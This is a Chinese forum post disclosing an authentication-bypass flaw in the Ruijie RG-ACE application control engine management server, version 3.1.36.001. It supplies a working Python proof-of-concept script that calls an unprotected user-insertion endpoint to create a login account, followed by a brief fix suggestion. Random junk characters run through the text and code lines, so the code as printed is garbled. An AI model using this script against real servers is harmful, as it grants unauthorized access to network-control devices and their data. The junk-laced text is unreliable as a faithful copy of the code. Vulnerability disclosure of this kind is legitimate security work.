找回密码
 立即注册
查看: 3049|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
, y1 Q. n) C; O! ~9 R: C2 w8 _! w4 g* O" T( @$ L2 ~4 }; @

0 o1 l! G, l: R测试的具体版本是# j$ P6 J/ e; v, J1 E5 |
产品名称: 锐捷应用控制引擎" K) E; k+ B4 n0 f( w+ l$ [
版本号: 3.1.36.001 TC* ^* Q$ o2 P2 U8 a( O
编译时间: 201104291730
7 J5 O( L4 R. F8 {2 V
8 X  B+ O; G' @3 m
5 G+ X( d& v7 r漏洞证明:. E; J9 n8 \, Q

; _  k# J6 e* N( g5 \" e( i$ V: Z6 Q
4 O( k7 B! s2 G! [

; X5 ^4 s" i: @
% Q- ?# @. n6 [$ B3 o0 Q/ B: @/ x5 Q' V# g
执行脚本
- `& H6 O) t' n5 G! N8 l#! /usr/bin/env python' `, Z( Z8 M! v: r% L5 n* M" ^
#coding=gbk4 P1 x8 d2 ?* E8 e. x( s* e
#RG-ACE管理服务器 V3.1.36.001
% g& W0 S) B% W$ ?: [import urllib2, urllib,cookielib
1 Q$ A# f6 ?7 U" S) |$ K* A/ S! A1 a# ?; Aurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
0 g$ k) y0 P5 h2 }opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))9 z" U. H- ~# J* @* h2 T
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]& @: p- S5 ]3 z& Q- U
post=(("event","userManager.doInsertUserInfo"),5 K' ?0 ^# ~3 Q& t8 _) P" X; m
("useractionname","addButtonValue"),7 a# a: ]4 Z0 a. h# ?: x4 H
("useropermanager","userManager"),- F0 F/ @: @" A% U! ^
("userName","t"), #######账号自己加9 c4 F! F: s7 A& y# h- x; ]
("pwd","aaaaaa"),######密码自己加
" H* {( ~7 q% g6 J- ~("trueName","ad"),
" h# |* U7 A: S0 I- S/ W("email",""),# R% V$ m0 C( F' S. t6 n
("mobilePhone",""),. n! `+ B; y  Y0 F
("officePhone",""),, M/ f' X. m* p/ g
("addr",""),- ^) e7 F' y! m" g$ y5 |& h
("submit","确定"))7 M: s! j4 n1 h; ~2 ?8 ?
urllib2.install_opener(opener)' x& G4 G- {7 w. J6 x# @  P/ T
p=urllib2.urlopen(url, urllib.urlencode(post)).read()  l3 x! ~: z* y8 u- l
print "Done"5 b  i. [7 c) R, L; a: X3 N

1 w+ }# P1 Y1 P! u( T- M2 Z登录,连接设备
" l: Y' z+ ~# c7 r! s' y* ?. g
7 h/ i/ j- Y% ~% I# D- o$ w3 g; H& |
5 ]# a" o8 K/ L9 @+ R" _+ P7 b. V
3 z" Z; M4 C. X' b! Q
( [' @' t3 B1 i4 g3 U
默认的管理员admin权限更大点
/ |7 s1 U# n6 K# ?/ n; P( X, o7 {2 q0 {% j" N% N, W
* I- G. t6 t9 t& [

; k' E: S0 b- o3 r/ B+ L1 ?0 Q  k
- R8 a. A/ i+ H- y! Q2 @/ C2 \& l- C0 Z9 m: U- M
修复方案:$ I2 X7 s7 j1 d
加强对接口的权限验证
: P1 r7 [9 p3 k$ W* A
/ q! F5 G1 E6 J" i3 W$ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表